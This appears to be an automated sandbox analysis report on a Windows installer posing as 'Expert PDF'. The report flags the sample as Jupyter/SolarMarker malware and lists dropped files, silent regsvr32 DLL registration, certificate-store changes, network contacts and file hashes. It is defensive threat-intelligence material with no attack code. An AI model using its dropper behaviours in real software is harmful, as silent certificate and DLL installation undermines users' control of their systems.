Analysis Overview
SHA256
07e3113b6d2367f8fab4668b46620fd6b6d15d0c3d21d4f066cedb8c54340e4b
Threat Level: Known bad
The file 07d8c9f5-af55-421d-9023-7932ab1810d7 was found to be: Known bad.
Malicious Activity Summary
Jupyter, SolarMarker
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Enumerates physical storage devices
Modifies registry class
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-17 18:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-17 18:08
Reported
2023-03-17 18:44
Platform
win7-20230220-en
Max time kernel
1621s
Max time network
1758s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6551F56D-61A4-48C1-A4E5-BD05B56AF5A4} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6551F56D-61A4-48C1-A4E5-BD05B56AF5A4}\ = "IOfferItemModule" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\Version | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FF8AE410-AE4C-42F6-AE76-8AFF4BAA4877} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FF8AE410-AE4C-42F6-AE76-8AFF4BAA4877}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3B61C79-2B42-4F76-BACE-44D020AD685C}\ = "IXMLSave" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3B61C79-2B42-4F76-BACE-44D020AD685C}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35164189-3FA8-48B4-95BA-C80602939FE9}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\ = "GeoIpStruct Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6551F56D-61A4-48C1-A4E5-BD05B56AF5A4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FE57A243-877C-4861-85D0-1FC8EA65CEA6}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35164189-3FA8-48B4-95BA-C80602939FE9}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FE57A243-877C-4861-85D0-1FC8EA65CEA6}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ = "IStartDataStruct" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0DE91E75-5D98-4F96-9C80-2AABD69C8130}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\ = "OfferItemModule Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{7F22E8EC-E952-440A-B440-83EB81854969} | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{414EF0A6-C5A0-4C61-8FA5-A0F1CB29B26F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0DE91E75-5D98-4F96-9C80-2AABD69C8130}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a11800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe
"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$70122,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | api-updateservice.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | api-updateservice.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | wsgeoip.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | wsgeoip.expert-pdf.com | tcp |
Files
memory/1768-54-0x0000000000400000-0x0000000000501000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
| MD5 | a95712856401dda069ee07c719bdb2ab |
| SHA1 | 73293e45116e0930d78087741016cde920922a74 |
| SHA256 | b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0 |
| SHA512 | 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85 |
C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
| MD5 | a95712856401dda069ee07c719bdb2ab |
| SHA1 | 73293e45116e0930d78087741016cde920922a74 |
| SHA256 | b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0 |
| SHA512 | 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85 |
\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\_isetup\_isdecmp.dll
| MD5 | c6ae924ad02500284f7e4efa11fa7cfc |
| SHA1 | 2a7770b473b0a7dc9a331d017297ff5af400fed8 |
| SHA256 | 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26 |
| SHA512 | f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae |
memory/1372-66-0x00000000001E0000-0x00000000001E1000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
memory/1372-81-0x0000000000400000-0x0000000000723000-memory.dmp
memory/1768-83-0x0000000000400000-0x0000000000501000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab409C.tmp
| MD5 | fc4666cbca561e864e7fdf883a9e6661 |
| SHA1 | 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5 |
| SHA256 | 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b |
| SHA512 | c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d |
C:\Users\Admin\AppData\Local\Temp\Tar4198.tmp
| MD5 | 73b4b714b42fc9a6aaefd0ae59adb009 |
| SHA1 | efdaffd5b0ad21913d22001d91bf6c19ecb4ac41 |
| SHA256 | c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd |
| SHA512 | 73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | e71c8443ae0bc2e282c73faead0a6dd3 |
| SHA1 | 0c110c1b01e68edfacaeae64781a37b1995fa94b |
| SHA256 | 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72 |
| SHA512 | b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6 |
C:\Users\Admin\AppData\Local\Temp\Tar4392.tmp
| MD5 | be2bec6e8c5653136d3e72fe53c98aa3 |
| SHA1 | a8182d6db17c14671c3d5766c72e58d87c0810de |
| SHA256 | 1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd |
| SHA512 | 0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff |
C:\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
